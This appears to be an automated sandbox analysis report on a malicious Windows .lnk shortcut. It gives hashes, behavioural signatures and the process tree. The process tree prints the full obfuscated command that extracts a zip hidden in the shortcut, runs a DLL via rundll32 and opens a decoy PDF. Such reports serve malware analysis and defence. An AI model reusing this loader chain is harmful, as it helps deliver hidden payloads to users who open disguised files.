Analysis
-
max time kernel
120s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
09/02/2023, 15:36
General
-
Target
647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a.lnk
-
Size
593KB
-
MD5
f6c23891999c108068f9b119f552729c
-
SHA1
f528f19b55119180c9202a2e22059590756d1185
-
SHA256
647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a
-
SHA512
4a5394474e9833ee00c3f405d89d284703f9578551b4b75b254968c4c6276bbb47922b74a4cfe8917a698d7c104c02afacf1cbea2ee682993d15ecabf8eacd0c
-
SSDEEP
12288:wHQSYtswIsMXhZEpUrvXVX1dPb7dnJGnpu8QjUDZUndu8kd:w7RsMXhuePVFVJknpu8Qj68kd
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c/c -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00608066} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003464..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& rundll32.exe $obf_dir\bloated-pestilence.dll,runner; .\sample.pdf2⤵
-